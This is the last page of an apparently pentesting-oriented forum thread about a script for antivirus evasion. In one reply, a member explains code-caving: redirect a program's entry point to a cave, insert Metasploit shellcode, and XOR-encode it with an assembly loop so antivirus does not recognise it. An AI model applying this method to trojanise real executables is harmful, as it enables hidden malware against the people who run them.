Page 12 of 12 FirstFirst ... 2101112
Results 111 to 114 of 114

Thread: [script] for AV evasion

  1. #111
    Just burned his ISO
    Join Date
    Apr 2008
    Posts
    3

    Default Re: [script] for AV evasion

    the script is out of date not useful anymore by default.
    there the result: https://www.virustotal.com/file/f088...is/1350717852/

    thanks for the script.

  2. #112
    Just burned his ISO
    Join Date
    Apr 2012
    Posts
    4

    Default Re: [script] for AV evasion

    Can anyone explain to me how to xor obfuscates the shellcode which I can then put in the temp.c that is created in this script. I'm tying to understand how this works so I'm going to try and do it manually, without the script. I know it's outdated but can anyone explain it to me??

  3. #113
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    I haven't really looked at the script in-depth for what it does, but I can tell you basically what's going on from my CTP experience with code-caving. Using this to generate exe's, as pointed out above, is not advisable, it's much better to code-cave something yourself. Look online for in-depth tutorials, but here's the gist. Take a program and open it in a debugger. Find an empty section or create your own, and replace the first few instructions with a jump to the empty section, saving the first few instructions, the value in ESP, and the start address in notepad or whatever. MAKE SURE TO SAVE ALL ADDRESSES! Then, generate your shellcode using MSF and paste it in the exe at around 100 bytes past your jump point for ample space to play around. Here's where XOR encoding comes in. Since the shellcode is analyzed by every AV, you must turn it into something that the AV can't recognize. By far the easiest way is XOR encoding, since double XOR Encoding returns the original shellcode. The way to do that is to write an XOR loop. The easiest XOR loop is a one byte jmp, but I prefer a 4-byte jump with a variable key if it's slightly harder to configure.
    So now your program looks like this:

    JMP TO CAVE
    ORIGINAL CODE
    .
    .
    .
    .
    .
    JMP POINT (CAVE)
    nop's
    XOR ENCODER
    nop's
    SHELLCODE
    .
    THE INSTRUCTIONS YOU OVERWROTE!!!!!
    MOV ESP, ORIGINAL VALUE!!!!
    JMP BACK TO ORIGINAL PROGRAM!
    ...


    Now here's how to program an XOR loop. Basically, from the start of the shellcode until the end: XOR the shellcode with the key, then INCREMENT or ADD 4 to EAX then JMP to XOR LOOP START until EAX > SHELLCODE LAST MEM ADDRESS

    Assume 0001 is the start address of the shellcode for simplicity, and 00ff is the end of the shellcode
    Also assume that 1000 is the start address of the encoder. Our loop now looks like this:

    1000 MOV EAX, 0001
    1004 XOR DWORD PTR EAX , {YOUR KEY IN HEX!!! I usually use something like 0x66656172 which is fear in ascii} [the other option is XOR BYTE PTR EAX, 0x{onebyte key}]
    1008 ADD EAX, 4 [With the other option this would be INC EAX]
    100B CMP EAX, 00ff
    1010 JLE 1004

    That basically does all I described. At this point, place a breakpoint at the end of the encoding loop then let it run, and save all the changed shellcode in the file. Tehn, when you rerun the program, the encoding loop decodes it, and runs the shellcode normally. This will hopefully change the shellcode enough for it to be unrecognizable to any AV's. I hope this helps.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  4. #114
    Just burned their ISO
    Join Date
    Mar 2013
    Posts
    1

    Default Re: [script] for AV evasion

    Hi All ,

    Can anybody please explain the X-OR section for this script .

    Thnx

Page 12 of 12 FirstFirst ... 2101112

Similar Threads

  1. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 General Topics
    Replies: 16
    Last Post: 05-01-2012, 09:26 PM
  2. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 Beginners Section
    Replies: 1
    Last Post: 07-16-2011, 02:16 PM
  3. Snort Signature Evasion with Metasploit
    By T0XIC in forum BackTrack 5 Videos
    Replies: 6
    Last Post: 07-01-2011, 12:21 PM
  4. Advanced antivirus evasion techniques
    By AzraelSepultura in forum Beginners Forum
    Replies: 4
    Last Post: 03-01-2011, 06:57 AM
  5. Firewall evasion techniques?
    By knithx in forum OLD Pentesting
    Replies: 2
    Last Post: 09-21-2009, 06:46 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •